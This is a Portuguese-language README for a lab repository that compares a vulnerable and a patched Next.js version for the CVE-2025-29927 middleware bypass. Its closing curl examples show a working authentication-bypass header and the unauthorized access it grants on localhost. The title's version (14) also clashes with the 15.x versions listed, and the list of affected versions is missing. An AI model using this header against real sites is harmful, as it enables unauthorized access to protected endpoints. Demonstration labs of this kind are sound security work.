
vulnerable-nextjs-14-CVE-2025-29927
Este repositório é um projeto monorepo que permite comparar a vulnerabilidade de middleware CVE-2025-29927 usando as versões Next.js 15.2.3 e Next.js 15.1.7.
A CVE-2025-29927 é uma vulnerabilidade de segurança encontrada no middleware do Next.js que permite contornar o middleware de autenticação usando o cabeçalho x-middleware-subrequest. Esta vulnerabilidade afeta as seguintes versões:
pnpm installpnpm dev$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}
$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}
nextjs-cve-2025-29927/
├── apps/
│ ├── next15_1_7/ # versão vulnerável
│ └── next15_2_3/ # versão corrigida
├── packages/
│ └── ui/ # componentes de UI compartilhados
└── README.md